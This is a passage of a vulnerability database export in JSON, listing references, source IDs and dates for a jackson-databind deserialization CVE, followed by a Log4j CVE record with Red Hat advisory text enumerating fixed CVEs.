"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48047"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157322/red-hat-security-advisory-2020-1523-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160601/red-hat-security-advisory-2020-5625-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4471/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-openjpa-wasregistrymanagedruntime-serialization-gadgets-typing-32065"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1399/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:3817"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://github.com/al1ex/cve-2020-11113"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2021-109/index.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhdm\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_decision_manager/7.8/html/release_notes_for_red_hat_decision_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:5625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=distributions\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2020:1414"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/19/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xeap-cd\u0026downloadtype=securitypatches\u0026version\u0019"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1732"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:1523"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14307"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14307"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163659"
},
{
"db": "VULMON",
"id": "CVE-2020-11113"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "PACKETSTORM",
"id": "159271"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163659",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11113",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159271",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11113",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "VULHUB",
"id": "VHN-163659",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11113",
"ident": null
},
{
"date": "2020-07-29T17:52:58",
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"date": "2020-12-17T18:09:37",
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"date": "2020-05-28T16:22:46",
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-04-21T14:19:58",
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"date": "2020-09-23T14:57:38",
"db": "PACKETSTORM",
"id": "159271",
"ident": null
},
{
"date": "2020-03-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1735",
"ident": null
},
{
"date": "2020-04-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003617",
"ident": null
},
{
"date": "2020-03-31T05:15:13.117000",
"db": "NVD",
"id": "CVE-2020-11113",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-10T00:00:00",
"db": "VULHUB",
"id": "VHN-163659",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11113",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1735",
"ident": null
},
{
"date": "2024-07-22T06:03:00",
"db": "JVNDB",
"id": "JVNDB-2020-003617",
"ident": null
},
{
"date": "2024-11-21T04:56:49.317000",
"db": "NVD",
"id": "CVE-2020-11113",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "FasterXML\u00a0jackson-databind\u00a0 Untrusted data deserialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
}
],
"trust": 0.6
}
}
VAR-201704-1589
Vulnerability from variot - Updated: 2026-03-09 20:56In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. A code issue vulnerability exists in Apache Log4j 2.x versions prior to 2.8.2. An attacker could exploit this vulnerability to execute arbitrary code.
Security Fix(es):
-
hawtio-osgi (CVE-2017-5645)
-
prometheus-jmx-exporter: snakeyaml (CVE-2017-18640)
-
apache-commons-compress (CVE-2019-12402)
-
karaf-transaction-manager-narayana: netty (CVE-2019-16869, CVE-2019-20445)
-
tomcat (CVE-2020-1935, CVE-2020-1938, CVE-2020-9484, CVE-2020-13934, CVE-2020-13935, CVE-2020-11996)
-
spring-cloud-config-server (CVE-2020-5410)
-
velocity (CVE-2020-13936)
-
httpclient: apache-httpclient (CVE-2020-13956)
-
shiro-core: shiro (CVE-2020-17510)
-
hibernate-core (CVE-2020-25638)
-
wildfly-openssl (CVE-2020-25644)
-
jetty (CVE-2020-27216, CVE-2021-28165)
-
bouncycastle (CVE-2020-28052)
-
wildfly (CVE-2019-14887, CVE-2020-25640)
-
resteasy-jaxrs: resteasy (CVE-2020-1695)
-
camel-olingo4 (CVE-2020-1925)
-
springframework (CVE-2020-5421)
-
jsf-impl: Mojarra (CVE-2020-6950)
-
resteasy (CVE-2020-10688)
-
hibernate-validator (CVE-2020-10693)
-
wildfly-elytron (CVE-2020-10714)
-
undertow (CVE-2020-10719)
-
activemq (CVE-2020-13920)
-
cxf-core: cxf (CVE-2020-13954)
-
fuse-apicurito-operator-container: golang.org/x/text (CVE-2020-14040)
-
jboss-ejb-client: wildfly (CVE-2020-14297)
-
xercesimpl: wildfly (CVE-2020-14338)
-
xnio (CVE-2020-14340)
-
flink: apache-flink (CVE-2020-17518)
-
resteasy-client (CVE-2020-25633)
-
xstream (CVE-2020-26258)
-
mybatis (CVE-2020-26945)
-
pdfbox (CVE-2021-27807, CVE-2021-27906)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1758619 - CVE-2019-16869 netty: HTTP request smuggling by mishandled whitespace before the colon in HTTP headers 1764640 - CVE-2019-12402 apache-commons-compress: Infinite loop in name encoding algorithm 1772008 - CVE-2019-14887 wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use 1785376 - CVE-2017-18640 snakeyaml: Billion laughs attack via alias feature 1790309 - CVE-2020-1925 olingo-odata: Server side request forgery in AsyncResponseWrapperImpl 1798509 - CVE-2019-20445 netty: HttpObjectDecoder.java allows Content-Length header to accompanied by second Content-Length header 1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages 1806398 - CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability 1806835 - CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling 1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size 1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE 1845626 - CVE-2020-5410 spring-cloud-config-server: sending a request using a specially crafted URL can lead to a directory traversal attack 1851420 - CVE-2020-11996 tomcat: specially crafted sequence of HTTP/2 requests can lead to DoS 1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1857024 - CVE-2020-13935 tomcat: multiple requests with invalid payload length in a WebSocket frame could lead to DoS 1857040 - CVE-2020-13934 tomcat: OutOfMemoryException caused by HTTP/2 connection leak could lead to DoS 1860054 - CVE-2020-14338 wildfly: XML validation manipulation due to incomplete application of use-grammar-pool-only in xercesImpl 1860218 - CVE-2020-14340 xnio: file descriptor leak caused by growing amounts of NIO Selector file handles may lead to DoS 1879042 - CVE-2020-25633 resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client's WebApplicationException handling 1880101 - CVE-2020-13920 activemq: improper authentication allows MITM attack 1881158 - CVE-2020-5421 springframework: RFD protection bypass via jsessionid 1881353 - CVE-2020-25638 hibernate-core: SQL injection vulnerability when both hibernate.use_sql_comments and JPQL String literals are used 1881637 - CVE-2020-25640 wildfly: resource adapter logs plaintext JMS password at warning level on connection error 1885485 - CVE-2020-25644 wildfly-openssl: memory leak per HTTP session creation in WildFly OpenSSL 1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs 1887257 - CVE-2020-26945 mybatis: mishandles deserialization of object streams which could result in remote code execution 1891132 - CVE-2020-27216 jetty: local temporary directory hijacking vulnerability 1898235 - CVE-2020-13954 cxf: XSS via the styleSheetPath 1903727 - CVE-2020-17510 shiro: specially crafted HTTP request may cause an authentication bypass 1908832 - CVE-2020-26258 XStream: Server-Side Forgery Request vulnerability can be activated when unmarshalling 1912881 - CVE-2020-28052 bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible 1913312 - CVE-2020-17518 apache-flink: directory traversal attack allows remote file writing through the REST API 1937440 - CVE-2020-13936 velocity: arbitrary code execution when attacker is able to modify templates 1941050 - CVE-2021-27906 pdfbox: OutOfMemory-Exception while loading a crafted PDF file 1941055 - CVE-2021-27807 pdfbox: infinite loop while loading a crafted PDF file 1945714 - CVE-2021-28165 jetty: Resource exhaustion when receiving an invalid large TLS frame
The References section of this erratum contains a download link (you must log in to download the update).
This release of Red Hat JBoss Enterprise Application Platform 7.0.8 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.7, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. (CVE-2017-5645)
-
A vulnerability was found in Jasypt that would allow an attacker to perform a timing attack on password hash comparison. (CVE-2014-9970)
-
It was found that an information disclosure flaw in Bouncy Castle could enable a local malicious application to gain access to user's private information. (CVE-2015-6644)
-
It was found that while parsing the SAML messages the StaxParserUtil class of Picketlink replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the "InResponseTo" field in the response. (CVE-2017-2582)
-
It was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue(). Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. Bugs fixed (https://bugzilla.redhat.com/):
1410481 - CVE-2017-2582 picketlink, keycloak: SAML request parser replaces special strings with system properties 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1444015 - CVE-2015-6644 bouncycastle: Information disclosure in GCMBlockCipher 1455566 - CVE-2014-9970 jasypt: Vulnerable to timing attack against the password hash comparison 1465573 - CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-11485 - Tracker bug for the EAP 7.0.8 release for RHEL-7
Security Fix(es):
-
bsh2: remote code execution via deserialization (CVE-2016-2510)
-
log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)
-
uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code (CVE-2017-15691)
-
mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
-
thrift: Improper Access Control grants access to files outside the webservers docroot path (CVE-2018-11798)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Installation instructions are available from the Fuse 7.3.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/
- Bugs fixed (https://bugzilla.redhat.com/):
1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code 1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) 1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path
